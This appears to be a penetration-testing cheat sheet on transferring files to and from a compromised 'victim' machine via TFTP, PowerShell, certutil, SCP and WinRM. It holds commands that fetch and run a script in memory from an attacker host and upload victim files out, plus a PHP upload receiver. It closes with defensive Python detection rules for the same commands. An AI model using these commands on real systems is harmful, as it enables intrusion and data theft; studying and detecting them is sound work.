File Transfers

TFTP

Trivial FTP (TFTP) is one of the simplest ways to transfer files between two systems. Windows 7 and above offer several ways to transfer files, such as FTP and PowerShell, but the problem arises when the system is older than Windows 7.

TFTP is present by default on older operating systems such as Windows XP, and it is a great tool for transferring files non-interactively.

Once the atftpd service is installed on your Linux system, you can use the following commands to transfer files,

sudo atftpd --daemon --port 69 /tftp

The above command starts the TFTP server on your local system, serving the /tftp directory. The following command can be used to transfer files into or out of the victim's system,

tftp -i 192.168.1.1 put evil.file

PowerShell

PowerShell on Windows can be used for transferring files between systems. There are two popular methods, Invoke-WebRequest and WebClient. Both use HTTP to download files from, or upload files to, a server.

You need a web server running in order to download files from it or upload files to it. An Apache server with PHP is ideal, since it can handle transfers in both directions. As a makeshift you can also use Python's built-in web server to serve files for download (it does not accept uploads). The following command starts that server,

sudo python3 -m http.server 80

To download a file to a Windows machine using WebClient,

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.php', 'new-exploit.php')

Building on the previous command, WebClient can also download a script and execute it in memory, without saving it to the victim's disk,

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.1/hello.ps1')

To upload a file to a Windows machine using WebClient,

powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.1/upload.php', 'evil.php')

Make sure the complete path of the file is given when using UploadFile: .NET resolves a relative path against the process working directory, which is not necessarily PowerShell's current location.

To download a file to a Windows machine using Invoke-WebRequest,

powershell.exe (Invoke-WebRequest http://192.168.1.1/evil.php -OutFile evil.php)

To upload a file to a Windows machine using Invoke-WebRequest,

powershell.exe (Invoke-WebRequest http://192.168.1.1/upload.php -Method Put -InFile C:\Users\Administrator\Desktop\evil.txt -UseBasicParsing)

In the last command the method "Put" is used instead of "Post": a PUT request sends the raw file as the request body, which avoids the multipart form encoding a POST upload would require on the client's end. A matching PHP script then has to be deployed on the server to read the request body and store the file.

The following is a sample of PHP code that can be deployed on the server to receive an uploaded file,

<?php
$uploaddir = '/var/www/uploads/';
if ($_SERVER['REQUEST_METHOD'] === 'PUT') {
    // Raw request body, as sent by Invoke-WebRequest -Method Put -InFile
    file_put_contents($uploaddir . 'put_upload', file_get_contents('php://input'));
} elseif (isset($_FILES['file'])) {
    // Multipart form upload, as sent by WebClient.UploadFile; basename() strips any path
    $uploadfile = $uploaddir . basename($_FILES['file']['name']);
    move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
}

SCP

SCP is a network protocol for transferring files securely between Linux systems. By default it connects to the remote server over SSH on port 22. You need the username and password of the remote server to which the file is being transferred. The following command is a sample file transfer,

scp file.txt remote_username@192.168.1.1:/Directory/Path

Certutil

Certutil is a built-in Windows tool that can be used for downloading files to the local system.

certutil.exe -urlcache -f http://192.168.1.1/test.exe test.exe

WinRM

When connected to a system over WinRM, the tool can be used for both uploading and downloading files.

upload <Filename-fullpath> <Upload path full>
download <Filename-fullpath> <Download Path full>
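From the defender's side, the transfer commands above are all visible in process-creation telemetry. As an added example (not part of the original page), the following Python turs them into regex rules and runs them over constructed events; the field names follow Sysmon Event ID 1, but the events and the rule names are made up here and the patterns will need tuning against real logs.

```python
import re
from typing import List, Tuple

# Each rule: (label, case-insensitive regex over the full command line).
# Rules and labels are constructed for this example, one per transfer method above.
RULES: List[Tuple[str, re.Pattern]] = [
    ("tftp_transfer", re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\b(put|get)\b", re.I)),
    ("certutil_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("ps_webclient", re.compile(r"System\.Net\.WebClient.*\.(DownloadFile|DownloadString|UploadFile)\(", re.I)),
    ("ps_download_cradle", re.compile(r"\b(IEX|Invoke-Expression)\b.*DownloadString\(", re.I)),
    ("ps_invoke_webrequest", re.compile(r"\bInvoke-WebRequest\b.*(-OutFile|-InFile)\b", re.I)),
]

def classify(cmdline: str) -> List[str]:
    """Return the label of every rule the command line matches (empty list if none)."""
    return [label for label, rx in RULES if rx.search(cmdline)]

def scan(events: List[dict]) -> List[dict]:
    """Run classify() over process-creation events and return only the events that hit."""
    hits = []
    for ev in events:
        labels = classify(ev.get("CommandLine", ""))
        if labels:
            hits.append({"Image": ev.get("Image"), "labels": labels, "CommandLine": ev["CommandLine"]})
    return hits

# Constructed sample events shaped like Sysmon Event ID 1 (process creation) fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\tftp.exe",
     "CommandLine": "tftp -i 192.168.1.1 put evil.file"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://192.168.1.1/test.exe test.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.1/hello.ps1')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe (Invoke-WebRequest http://192.168.1.1/upload.php -Method Put -InFile C:\\Users\\Administrator\\Desktop\\evil.txt -UseBasicParsing)"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verify -urlfetch cert.cer"},  # benign: no -urlcache, no URL
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\Administrator\\notes.txt"},  # benign
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["labels"], hit["CommandLine"])
```

The two benign events show the rules keying on the transfer-specific switches rather than on the binary name alone.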
